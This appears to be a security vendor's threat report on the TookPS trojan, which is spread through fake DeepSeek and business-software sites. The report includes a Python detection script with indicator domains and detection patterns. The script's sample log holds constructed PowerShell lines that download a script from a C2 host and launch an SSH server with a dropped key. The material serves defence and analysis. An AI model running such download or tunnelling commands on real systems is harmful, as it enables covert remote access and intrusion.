Beyond DeepSeek: The Rise of TookPS Trojan

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.
Summary
CRIL came across a blog published by Kaspersky detailing multiple malicious campaigns that use the DeepSeek LLM as a lure to distribute the TookPS downloader. Telemetry revealed that the malware was also delivered through fake websites mimicking legitimate tools such as UltraViewer, AutoCAD, and SketchUp. Further analysis identified additional malicious file names such as “Ableton.exe” and “QuickenApp.exe”, indicating broader targeting of users in the business, creative, and finance sectors. Both individuals and organizations are at risk from these deceptive distribution tactics.

Technical Details
In research into attacks using DeepSeek-themed lures, researchers analyzed how the infection begins. Once the initial malware gains access to a victim’s system, it connects to a command-and-control (C2) server, whose address is hardcoded into the binary, to retrieve a PowerShell script. Different samples communicate with different domains. For instance, one sample connected to “bsrecov4[.]digital” (inactive at the time of our investigation) and received a base64-encoded PowerShell command.

When decoded, the script reveals a sequence of three PowerShell scripts that are downloaded and executed. The first script pulls an SSH server executable, its configuration file, and an RSA key from the attacker’s server. The second script retrieves connection parameters—such as server address, port, and username—and launches the SSH server, creating a secure tunnel between the infected machine and the remote server. This tunnel gives the attacker full remote access, authenticated using the downloaded RSA key.

The third script attempts to download a modified remote access tool. This altered version uses a technique called DLL sideloading, where a malicious library is placed alongside a legitimate application (in this case, TeamViewer) to hijack its behavior. This allows the attacker to covertly control the system while hiding their presence. The domain used for this part of the operation was invoicingtools[.]com.

Another backdoor was also observed on infected systems, though its exact delivery method is still unknown. It communicates with “twomg[.]xyz” for instructions. These components work together to give attackers full control over the victim’s system. We found no legitimate services at the related IP addresses, and many of the associated domains had already been flagged and blocked by our security tools, suggesting the attackers had a history of malicious activity predating this campaign.
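As an added triage illustration, not code from the original report or from Kaspersky: a small Python script that decodes PowerShell -EncodedCommand payloads found in process-creation command lines and flags the behaviours described above (script download cradle, SSH server launch with a dropped RSA key, TeamViewer DLL sideload) together with the three domains named in this report. The sample log lines, function names and regex patterns are constructed assumptions; the report does not state that the C2 command was delivered via -EncodedCommand, so the decoder also accepts plain UTF-8 base64.

```python
import base64
import re

# Domains named in the report, defanged as on the page.
KNOWN_C2 = ["bsrecov4[.]digital", "invoicingtools[.]com", "twomg[.]xyz"]
# Assumed patterns for the three stages described above: script download,
# SSH server launch with a dropped RSA key, and a TeamViewer DLL sideload.
STAGE_PATTERNS = {
    "download_cradle": r"(?i)invoke-webrequest|downloadfile|downloadstring|start-bitstransfer",
    "ssh_server": r"(?i)\bsshd?(\.exe)?\b",
    "rsa_key": r"(?i)id_rsa|\.pem\b",
    "teamviewer_sideload": r"(?i)teamviewer.*\.dll",
}

def encode_for_powershell(script: str) -> str:
    """UTF-16LE + base64, the encoding PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the line carries -EncodedCommand/-enc/-e, else None."""
    m = re.search(r"(?i)-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)
    try:
        text = raw.decode("utf-16le")
        if sum(ord(c) < 128 for c in text) >= 0.9 * len(text):  # real scripts are mostly ASCII
            return text
    except UnicodeDecodeError:  # odd length or bad surrogate: this was not UTF-16
        pass
    return raw.decode("utf-8", errors="replace")  # some loaders base64 plain UTF-8 instead

def analyse(cmdline: str) -> list:
    """Decode one command line and list the campaign behaviours and C2 domains it shows."""
    script = decode_encoded_command(cmdline) or cmdline
    hits = [name for name, pat in STAGE_PATTERNS.items() if re.search(pat, script)]
    hits += ["c2:" + d for d in KNOWN_C2 if d.replace("[.]", ".") in script.lower()]
    return hits

# Constructed sample process-creation lines (not telemetry from the report).
SAMPLE_LOG = [
    "svchost.exe -k netsvcs",
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
        "Invoke-WebRequest http://bsrecov4.digital/s1.ps1 -OutFile $env:TEMP\\s1.ps1"),
    "powershell.exe -enc " + encode_for_powershell(
        "Start-Process sshd.exe -ArgumentList '-f cfg'; Copy-Item id_rsa $env:TEMP"),
]

def scan_log(lines):
    """Map line index -> hits, omitting lines with nothing suspicious."""
    return {i: h for i, line in enumerate(lines) if (h := analyse(line))}
```

Running `scan_log(SAMPLE_LOG)` flags the two encoded lines and leaves the benign svchost line out; in practice the hit names map onto the stages above for an analyst to pivot on.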
Recommendations
Download software only from official websites or trusted sources to avoid malicious versions disguised as legitimate applications.
Implement strict policies that block the installation of unauthorized software and restrict access to known malicious or pirated websites.
Conduct regular security awareness training to help users identify phishing attempts, suspicious downloads, and other common attack vectors.
Conclusion
The DeepSeek-themed attacks revealed a much larger campaign targeting both individual users and organizations. By disguising malware as popular and business-critical software, attackers were able to infect systems and establish covert access through multiple techniques. This operation highlights the attackers’ focus on stealth, persistence, and broad targeting across different sectors.